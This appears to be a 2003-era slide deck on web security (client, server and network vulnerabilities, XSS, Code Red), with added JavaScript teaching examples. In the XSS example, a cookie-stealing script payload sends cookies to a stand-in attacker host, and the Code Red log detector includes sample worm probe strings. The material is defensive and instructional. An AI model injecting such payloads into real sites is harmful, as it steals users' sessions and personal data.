
Ladd Van Tol, Senior Software Engineer

Security on the Web

Part One - Vulnerabilities

Vulnerabilities

• Client
  • Browser
  • Operating System
  • Secondary Software

• Server
  • Web Server
  • Operating System
  • Secondary Software

• Network
  • Protocol
  • Transport

Types of Clients

• Web Browsers (market share at the time of this talk; see the w3schools browser stats in the bibliography)
  • Internet Explorer: > 90%
  • Mozilla derivatives: < 5%

• Operating Systems
  • Windows: > 90%
  • Macintosh: < 5%
  • Linux: < 1%

• Secondary Software
  • Email clients
  • Browser add-ons

Browser Protocol

• HyperText Transfer Protocol (HTTP)
  • versions 1.0, 1.1
  • stateless request/response protocol carried over TCP/IP
  • cookies (the only state the protocol itself provides)
  • basic authentication (credentials sent base64-encoded, not encrypted)
  • transfer encodings
  • keep-alive, pipelining

• Secure Sockets Layer (SSL)
  • encrypts the connection
  • server identity verified by the server's certificate
  • certificate issued by a certification authority (CA)
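To make the protocol points above concrete, here is an added example (not from the original slides) that parses a raw HTTP/1.1 request and pulls out the pieces the slide names: the request line, headers, the Cookie header, Basic authentication and the keep-alive decision. The request text, the host name and the credentials are constructed for this example. Note that the Basic credentials come out in clear text, which is exactly what a sniffer on a non-SSL connection sees.

```javascript
// Added example: minimal HTTP/1.1 request parser (Node.js, no dependencies).
// The request below is constructed for this example; the credentials are
// "alice:password123" base64-encoded, as Basic authentication sends them.
const SAMPLE_REQUEST =
  'GET /account/settings HTTP/1.1\r\n' +
  'Host: www.example.com\r\n' +
  'Cookie: sessionid=3f9a2c; prefs=dark\r\n' +
  'Authorization: Basic YWxpY2U6cGFzc3dvcmQxMjM=\r\n' +
  'Connection: keep-alive\r\n' +
  '\r\n';

function parseRequest(raw) {
  // The head ends at the first blank line (CRLF CRLF); anything after is the body.
  const headEnd = raw.indexOf('\r\n\r\n');
  if (headEnd < 0) throw new Error('incomplete request head');
  const [requestLine, ...headerLines] = raw.slice(0, headEnd).split('\r\n');
  const [method, target, version] = requestLine.split(' ');
  if (!method || !target || !/^HTTP\/1\.[01]$/.test(version)) {
    throw new Error('malformed request line: ' + requestLine);
  }
  // Header names are case-insensitive, so normalise them; repeated headers are joined.
  const headers = {};
  for (const line of headerLines) {
    const colon = line.indexOf(':');
    if (colon <= 0) throw new Error('malformed header: ' + line);
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    headers[name] = headers[name] ? headers[name] + ', ' + value : value;
  }
  return { method, target, version, headers, body: raw.slice(headEnd + 4) };
}

// Cookies are the only state HTTP carries between requests: "name=value" pairs
// separated by "; " in a single Cookie header.
function parseCookies(header) {
  const jar = {};
  if (!header) return jar;
  for (const part of header.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Basic authentication is base64("user:password"): an encoding, not encryption.
// Without SSL anyone sniffing the connection recovers the password directly.
function decodeBasicAuth(header) {
  const m = /^Basic\s+([A-Za-z0-9+/=]+)$/.exec(header || '');
  if (!m) return null;
  const decoded = Buffer.from(m[1], 'base64').toString('utf8');
  const colon = decoded.indexOf(':');
  if (colon < 0) return null;
  return { user: decoded.slice(0, colon), password: decoded.slice(colon + 1) };
}

// Keep-alive: HTTP/1.1 connections persist unless "Connection: close" is sent;
// HTTP/1.0 connections close unless "Connection: keep-alive" is sent.
function isPersistent(req) {
  const conn = (req.headers['connection'] || '').toLowerCase();
  return req.version === 'HTTP/1.1' ? conn !== 'close' : conn === 'keep-alive';
}

const req = parseRequest(SAMPLE_REQUEST);
console.log(req.method, req.target, parseCookies(req.headers['cookie']));
console.log('credentials readable on the wire:', decodeBasicAuth(req.headers['authorization']));
console.log('persistent connection:', isPersistent(req));
```

The parser is deliberately strict: a request line with an unknown version or a header without a colon is rejected rather than guessed at, which is the behaviour you want in anything that sits in front of an application server.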

Browser Content

• HTML rendering
  • HTML 1.0, 2.0, 3.2, 4.01; XHTML 1.0, 1.1
  • XML + XSL
  • CSS 1.0, 2.0

• Embedded Dynamic Features
  • JavaScript, Java, ActiveX
  • Media players, other plug-ins

Client Vulnerabilities

• Social engineering
  • Spoofing
  • Can exploit DNS, or look-alike URLs

• Embedding Weaknesses
  • Java, ActiveX security policy
  • Plug-in security policy

• Buffer overflows
  • Can affect browser, OS, or add-on software
  • Could be a "remote root exploit": full control of the client machine from a crafted page or file
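The look-alike URL bullet above is the kind of thing a client can check mechanically. The following added example (not from the original slides) classifies a link against a trusted host name using Node's built-in WHATWG URL parser. It covers the three spoofing tricks a practitioner sees most: the trusted name placed in the userinfo part before "@", the trusted name used as a subdomain prefix of an attacker's domain, and visually confusable characters. The trusted host, the sample links and the small confusables table are all assumptions made for this example.

```javascript
// Added example: classifying links that try to look like a trusted site.
// TRUSTED_HOST and the links in the comments are constructed for this example.
const TRUSTED_HOST = 'www.example-bank.com';

// The host the browser will actually connect to. Userinfo ("user@") and the
// path are not part of the host, however much they are made to look like one.
function realHost(link) {
  return new URL(link).hostname.toLowerCase();
}

// A small table of characters commonly swapped for look-alikes in hostnames.
// A production check would use a full Unicode confusables table; this is a
// deliberately short illustration.
const CONFUSABLES = { '0': 'o', '1': 'l', '5': 's', 'rn': 'm', 'vv': 'w' };

// Reduce a host to a "skeleton" so that look-alike spellings compare equal.
function skeleton(host) {
  let s = host.toLowerCase();
  for (const [from, to] of Object.entries(CONFUSABLES)) s = s.split(from).join(to);
  return s;
}

// Returns 'trusted', 'other', or 'spoof:<kind>' for the given link.
function classifyLink(link) {
  const url = new URL(link);
  const host = url.hostname.toLowerCase();
  if (host === TRUSTED_HOST) return 'trusted';
  // e.g. http://www.example-bank.com.evil.example/ : trusted name used as a prefix.
  if (host.startsWith(TRUSTED_HOST + '.')) return 'spoof:prefix';
  // e.g. http://www.examp1e-bank.com/ : same skeleton, different host.
  if (skeleton(host) === skeleton(TRUSTED_HOST)) return 'spoof:lookalike';
  // e.g. http://www.example-bank.com@evil.example/ : the browser ignores the
  // part before "@" when connecting, but a user reading the link may not.
  if (url.username.toLowerCase() === TRUSTED_HOST) return 'spoof:userinfo';
  return 'other';
}

for (const link of [
  'https://www.example-bank.com/login',
  'http://www.example-bank.com@evil.example/login',
  'http://www.example-bank.com.evil.example/',
  'http://www.examp1e-bank.com/',
]) {
  console.log(classifyLink(link), '<-', link, '(connects to', realHost(link) + ')');
}
```

Note that none of these checks defend against the DNS attack mentioned on the slide: if the resolver is poisoned, the host name is the right one and the address behind it is wrong, which is what the server certificate under SSL is there to catch.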

Client Vulnerabilities

• Scripting Weaknesses
  • JavaScript security policy

• Cross-site scripting (XSS) attacks
  • Typically target sites that hold personal information
  • Often exploit unfiltered user input (comment areas, forums, etc.)
  • Inject malicious scripts which run in other visitors' browsers and can steal cookies or other info
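The "unfiltered user input" bullet is easiest to see with the vulnerable renderer next to its fixed form. The following is an added example (not from the original slides): a comment renderer for a forum page, first pasting the user's text straight into the HTML and then HTML-escaping it, plus a crude check for live script in the output. The cookie-stealing payload and the attacker host name are constructed for this example.

```javascript
// Added example: a forum comment renderer, vulnerable and hardened.
// The payload and attacker.example are constructed for this example.
const COOKIE_STEALER =
  '<script>new Image().src="http://attacker.example/log?c="+document.cookie</script>';

// Vulnerable: the user's text becomes live markup. Every visitor's browser runs
// the script with this site's origin, so it can read this site's cookies.
function renderCommentUnsafe(author, text) {
  return '<div class="comment"><b>' + author + '</b>: ' + text + '</div>';
}

// Hardened: every character with meaning in HTML text or attribute context is
// replaced by its entity, so the payload is shown as text rather than executed.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[ch]);
}

function renderCommentSafe(author, text) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
    escapeHtml(text) + '</div>';
}

// Crude reviewer's check: does the fragment contain a script element or an
// inline event-handler attribute inside a real tag? Escaped text has no "<",
// so it can never match.
function containsActiveScript(html) {
  return /<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

for (const payload of [COOKIE_STEALER, '<img src=x onerror=alert(document.cookie)>']) {
  console.log('unsafe:', containsActiveScript(renderCommentUnsafe('mallory', payload)));
  console.log('safe:  ', containsActiveScript(renderCommentSafe('mallory', payload)));
}
```

Escaping is context-specific: the table above is right for HTML text and quoted attributes, but input placed inside a `<script>` block, a URL, or CSS needs the escaping rules of that context, and a filter that only strips `<script>` tags misses the event-handler form shown in the second payload.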

Privacy/Content

• Privacy Policies
  • Cookies
  • Usage tracking
  • Browser control over advertising
  • Content filtering

Types of Servers

• Estimated 35 million servers on the web (includes virtual hosts)

• Apache
• Microsoft IIS*
• Sun ONE*

© 2003, Netcraft

*Business sites are more likely to be using commercial servers

Operating Systems

• Linux, BSD variants
• Windows flavor-of-the-week
• Solaris, other high-end Unixes

Secondary Services

• Database Servers
  • MySQL, SQL Server, Oracle, DB2

• Web Applications
  • Implementation platforms
  • Scripting: PHP, Perl, Python, ASP, JSP, XSP
  • Java frameworks: J2EE, WebSphere, WebLogic, WebObjects
  • Other frameworks: .NET

Server Vulnerabilities

• Exploitable Web Applications
  • Source of many serious targeted exploits
  • The main categories (largely the OWASP Top Ten cited in the bibliography):
    • Unvalidated Parameters
    • Broken Access Control
    • Session Hijacking
    • Cross-Site Scripting Flaws
    • Command Injection Flaws
    • Error Handling Problems
    • Insecure Use of Cryptography
    • Remote Administration Flaws
    • Web and Application Server Misconfiguration

Server Vulnerabilities

• Other attacks
  • Denial of Service
  • Remote root exploits
  • Network topology, protocols
  • Worms
  • Limited ability to enforce acceptable use policies

Worm Example: Code Red

• Exploited an IIS vulnerability (unchecked buffer in the Index Server ISAPI extension, reached through .ida requests); worm deployed July 2001
• Infected hosts then launched a distributed denial of service (DDoS) attack
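An operator looking for Code Red in 2001 had one very recognisable signal: a GET for /default.ida whose query string is a long run of a single repeated character followed by %u-encoded bytes (N for the first worm, X for Code Red II), as documented in the CAIDA and CERT analyses cited in the bibliography. The following added example (not from the original slides) runs that check over IIS W3C-format log lines and tallies probing sources. The log lines and client addresses are constructed for this example.

```javascript
// Added example: detecting Code Red probes in IIS W3C extended log lines.
// Field order assumed: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
// All lines below are constructed for this example.
const SAMPLE_LOG = [
  '2001-07-19 10:00:01 10.1.2.3 GET /index.html - 200',
  '2001-07-19 10:00:05 192.0.2.44 GET /default.ida ' +
    'N'.repeat(224) + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 200',
  '2001-07-19 10:00:09 198.51.100.7 GET /default.ida ' +
    'X'.repeat(224) + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 200',
  '2001-07-19 10:00:12 10.1.2.9 GET /images/logo.gif - 304',
  '2001-07-19 10:00:20 10.1.2.3 GET /default.ida q=1 404',
];

function parseIisLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  return {
    date: f[0], time: f[1], clientIp: f[2], method: f[3],
    uriStem: f[4], uriQuery: f[5], status: Number(f[6]),
  };
}

// The Code Red request shape: /default.ida, then at least 100 copies of the same
// padding character, then %uXXXX-encoded payload. Matching both N and X covers
// the original worm and Code Red II.
function isCodeRedProbe(entry) {
  if (!entry || entry.method !== 'GET') return false;
  if (!/\/default\.ida$/i.test(entry.uriStem)) return false;
  return /^([NX])\1{99,}.*%u[0-9a-f]{4}/i.test(entry.uriQuery);
}

// Any .ida request at all is worth knowing about: it means the Indexing Service
// ISAPI mapping is still enabled on the server, patched or not.
function isIdaRequest(entry) {
  return !!entry && /\.ida$/i.test(entry.uriStem);
}

// Count probing sources; the status code does not matter, since a 200 and a
// 404 both mean the request reached IIS.
function findCodeRedSources(lines) {
  const hits = {};
  for (const line of lines) {
    const e = parseIisLine(line);
    if (isCodeRedProbe(e)) hits[e.clientIp] = (hits[e.clientIp] || 0) + 1;
  }
  return hits;
}

console.log('Code Red probes by source:', findCodeRedSources(SAMPLE_LOG));
console.log('any .ida requests:', SAMPLE_LOG.map(parseIisLine).filter(isIdaRequest).length);
```

Two caveats a practitioner would add: a hit from an internal address means that host is already infected and scanning, not merely probing you; and the durable fix was the vendor patch plus removing the .ida script mapping, which is why `isIdaRequest` is reported separately.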

Networks

• Internet uses TCP/IP (TCP and UDP over IP)
• Connected networks
  • Routers
  • Domain Name Servers (DNS)
  • Firewalls
  • Virtual Private Networks (VPN)
  • Proxy servers
  • Load balancers

Network Vulnerabilities

• Availability
  • Attacks on key routers
  • Attacks on DNS

• Confidentiality
  • Sniffing clear-text traffic (plain HTTP, including cookies and Basic-auth credentials, is readable on the wire unless SSL is used)

Bibliography

• W3 Consortium - http://w3c.org
• w3schools browser stats - http://www.w3schools.com/browsers/browsers_stats.asp
• Thawte - http://thawte.com
• Cross-site scripting FAQ - http://www.cgisecurity.com/articles/xss-faq.shtml
• Netcraft Web Server Survey - http://netcraft.co.uk/survey/
• CERT - http://www.cert.org/
• CAIDA Analysis of Code Red - http://www.caida.org/analysis/security/code-red/
• OWASP Top 10 Vulnerabilities - http://www.serverwatch.com/news/article.php/1568761
• Personal experience, 3+ years at:
  • MacFixIt.com
  • MacCentral.com
  • VersionTracker.com